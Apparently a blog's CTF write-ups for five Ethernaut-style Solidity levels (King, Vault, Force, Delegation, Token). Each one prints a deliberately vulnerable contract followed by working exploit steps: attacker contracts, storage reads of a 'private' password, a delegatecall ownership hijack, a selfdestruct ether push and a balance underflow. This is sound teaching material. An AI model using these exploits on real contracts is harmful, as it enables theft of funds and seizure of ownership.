28 Aug 2022
Difficulty: πππππ
The contract below represents a very simple game: whoever sends it an amount of ether that is larger than the current prize becomes the new king. On such an event, the overthrown king gets paid the new prize, making a bit of ether in the process! As ponzi as it gets xD
Such a fun game. Your goal is to break it.
When you submit the instance back to the level, the level is going to reclaim kingship. You will beat the level if you can avoid such a self proclamation.
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract King {
address payable king;
uint public prize;
address payable public owner;
constructor() public payable {
owner = msg.sender;
king = msg.sender;
prize = msg.value;
}
receive() external payable {
require(msg.value >= prize || msg.sender == owner);
king.transfer(msg.value);
king = msg.sender;
prize = msg.value;
}
function _king() public view returns (address payable) {
return king;
}
}
Writeup
There is the warning from Solidity document :
When Ether is sent directly to a contract (without a function call, i.e. sender uses send or transfer) but the receiving contract does not define a receive Ether function or a payable fallback function, an exception will be thrown, sending back the Ether (this was different before Solidity v0.4.0). If you want your contract to receive Ether, you have to implement a receive Ether function (using payable fallback functions for receiving Ether is not recommended, since the fallback is invoked and would not fail for interface confusions on the part of the sender).
If king is a contract that can not receive Ether, king.transfer(msg.value)
fails every time it is executed.
- Get new instance.
- Call the method
await contract._king()
// '0x43BA674B4fbb8B157b7441C2187bCdD2cdF84FD5'
// owner address is '0x43BA674B4fbb8B157b7441C2187bCdD2cdF84FD5' too.
- Create a contract without
receive
and fallback
.
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import './9_King.sol';
contract KingAttacker {
function attack(address payable _addr) public payable {
King king = King(_addr);
(bool sent, ) = address(king).call.value(msg.value)("");
require(sent, "Failed to send value");
}
}
- Compile & deploy.
- Call
attack
method with the level instance address as the parameter _addr
and value 1wei ( the same as state variable prize
) .
- Call the method
await contract._king()
// Your KingAttacker contract address
- Submit instance ΞΎ( βΏοΌβ‘β)
Reference
28 Aug 2022
Difficulty: πππππ
Unlock the vault to pass the level!
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Vault {
bool public locked;
bytes32 private password;
constructor(bytes32 _password) public {
locked = true;
password = _password;
}
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}
Writeup
How can we get private variable password ? Well, There is an important method everyone should know : web3.eth.getStorageAt(...)
, checkout web3.js document to get details.
State variables marked as private and local variables are still publicly accessible.
- Get new Instance.
- Call the method
await contract.locked()
// true
- Call the method
await web3.eth.getStorageAt('0x7B794D77e945A806b2c6Ca41cb4bB6977F37D340', 1);
// '0x412076657279207374726f6e67207365637265742070617373776f7264203a29'
- Call web3 method
web3.utils.toAscii('0x412076657279207374726f6e67207365637265742070617373776f7264203a29')
// 'A very strong secret password :)'
- Call the method
await contract.unlock('0x412076657279207374726f6e67207365637265742070617373776f7264203a29')
- Call the method
await contract.locked()
// false
- Submit instance ΞΎ( βΏοΌβ‘β)
28 Aug 2022
Difficulty: πππππ
Some contracts will simply not take your money Β―_(γ)_/Β―
The goal of this level is to make the balance of the contract greater than zero.
Things that might help:
- Fallback methods
- Sometimes the best way to attack a contract is with another contract.
- See the Help page above, section βBeyond the consoleβ
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Force {/*
MEOW ?
/\_/\ /
____/ o o \
/~____ =ΓΈ= /
(______)__m_m)
*/}
Writeup
The keypoint to complete this level is selfdestruct
. After calling selfdestruct
method, contract will send all remaining Ether to a designated address. A malicious contract can use selfdestruct to force sending Ether to any contract.
- Get new Instance.
- Create a contract
// SPDX-License-Identifier: MIT
pragma solidity 0.8.16;
contract Force {/*
MEOW ?
/\_/\ /
____/ o o \
/~____ =ΓΈ= /
(______)__m_m)
*/}
contract ForceAttacker {
Force force;
// For a contract to be able to receive ether, the constructor function must be marked payable.
constructor(Force _force) payable {
force = Force(_force);
}
function getBalance() public view returns (uint256) {
return address(this).balance;
}
function attack() public {
address payable addr = payable(address(force));
selfdestruct(addr);
}
}
- Compile & Deploy

- Click getBalnce button, it will return 1wei.

- Click attack button. The contract will self-destruct, and the remaining 1wei will be send to Force contract.
- Submit instance ΞΎ( βΏοΌβ‘β)
Reference
Solidity by example - Self Destruct
28 Aug 2022
Difficulty: πππππ
The goal of this level is for you to claim ownership of the instance you are given.
Things that might help
- Look into Solidityβs documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
- Fallback methods
- Method ids
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Delegate {
address public owner;
constructor(address _owner) public {
owner = _owner;
}
function pwn() public {
owner = msg.sender;
}
}
contract Delegation {
address public owner;
Delegate delegate;
constructor(address _delegateAddress) public {
delegate = Delegate(_delegateAddress);
owner = msg.sender;
}
fallback() external {
(bool result,) = address(delegate).delegatecall(msg.data);
if (result) {
this;
}
}
}
Writeup
- Get new Instance.
- Call the method
await contract.sendTransaction({data: web3.eth.abi.encodeFunctionSignature("pwn()")})
You can find the detail about encodeFunctionSignature()
in there .
- Submit instance ΞΎ( βΏοΌβ‘β)
Reference
Solidity by example - delegatecall
27 Aug 2022
Difficulty: πππππ
The goal of this level is for you to hack the basic token contract below.
You are given 20 tokens to start with and you will beat the level if you somehow manage to get your hands on any additional tokens. Preferably a very large amount of tokens.
Things that might help:
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Token {
mapping(address => uint) balances;
uint public totalSupply;
constructor(uint _initialSupply) public {
balances[msg.sender] = totalSupply = _initialSupply;
}
function transfer(address _to, uint _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
}
function balanceOf(address _owner) public view returns (uint balance) {
return balances[_owner];
}
}
Writeup
There is a famous security pitfall. We can use technique Underoverflow to complete this level.
- Get new instance.
- Call the method
await contract.balanceOf('YOUR_ACCOUNT').then(v=>v.toString())
It will return default balance 20
.
- Call the method
await contract.transfer('OTHER_ACCOUNT', 1000000)
- Call the method
await contract.balanceOf('YOUR_ACCOUNT').then(v=>v.toString())
It will return a very big amount.
- Submit instance ΞΎ( βΏοΌβ‘β)
